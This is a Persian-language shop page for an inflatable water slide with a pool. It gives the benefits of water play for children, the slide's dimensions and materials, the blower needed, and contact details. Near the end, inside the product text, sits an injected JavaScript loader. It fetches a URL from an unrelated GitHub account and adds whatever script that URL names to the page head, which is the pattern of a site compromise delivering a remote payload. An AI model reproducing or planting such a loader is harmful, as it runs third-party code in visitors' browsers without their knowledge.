سرسره آبی بادی استخر دار

  • سرسره بازی کردن یک تفریح پر هیجان برای هر رده سنی می باشد. سرسره بادی یکی از پرطرف‌دارترین وسایل بازی برای همه نسل‌ها به شمار می‌رود. سرسره‌ها از ساده‌ترین و قدیمی‌ترین وسایل بازی هستند که فواید زیادی برای کودکان و بزرگسالان به دنبال دارند.

    بر اساس فوایدی که سرسره بازی و آب بازی برای کودک دارد اکثر والدین دنبال خرید سرسره و استخر هستند ولی نمی داند کدام یک را برای کودکان خود بخرند. این سرسره بادی که طراحان ما طراحی کردند مشکل این دوراهی برای شما حل کردند. این سرسره علاو بر این استخر دارد می توانید با آب از آن استفاده کنید یعنی این که روی سرسره آب بریزید.

    فواید آب بازی برای کودکان

    بازی با آب کی از جذاب ترین و هیجان انگیز ترین بازی ها میان کودکان است. آب بازی فواید مثبتی بر روی رویحه کودکان دارد مانند افزایش هوش و یادگیری، احساس آرامش و رفع تنش ها و رشد خلاقیت و برخی مهارت های مهم کی بیشتر افراد به آنها توجهی ندارند.

    ۵ فایده آب بازی برای رشد کودک شما

    • رشد خلاقیت و قوه تخیل
    • رشد مهارت اجتماعی
    • رشد مهارت های حرکتی و اکتشاف حسی
    • آب بازی باعث افزایش تمرکز می شود
    • رشد ریاضیات و مفاهیم علمی

    شما می توانید با خرید این سرسره بادی برای کودکان خود با یک تیر دو نشان بزنید یعنی کودک شما درکنار سرسره بازی آب بازی می کند.

    درباره این سرسره آبی بادی

    ابعاد سرسره بادی آبی استخر دار طول این سرسره بادی 8 متر و عرض آن 5.3 متر می باشد. همچنین این سرسره دارای 4 متر ارتفاع و 2 متر ارتفاع سکو است. بنابرین برای محیط هایی با ارتفاع پایین مناسب نیست.

    ابعاد استخر این سرسره به صورت طول 3 متر و عرض 3 متر می باشد. استفاده از این سرسره بادی در سواحل دریایی و پارک ای آبی پیشنهاد می شود.

    جنس پارچه و دوخت پارچه این سرسره از با کیفیت ترین پارچه کره ای تهیه شده و دوام بسیار بالایی دارد. همچنین دوخت این سرسره با نخ ترکیه ای توسط اساتید مجرب و با تجربه در این حوزه دوخته شده است.

    لوازم جانبی این سرسره بادی نیازمند لوازم اولیه مانند روکش سر می باشد. اما به علت آبی بودن این قصر بادی نیازی به خرید واکس نیست. همچنین این محصول نیازمند یک عدد دمنده باد ( پمپ هوا ) یک اسب می باشد. برای پر کردن باد استخر به دمنده دائمی نیازی نیست و می توانید از یک بلوور باد 1200 وات استفاده نمایید.

    نحوه خرید سرسره آبی بادی

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خریداین دستگاه ها می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید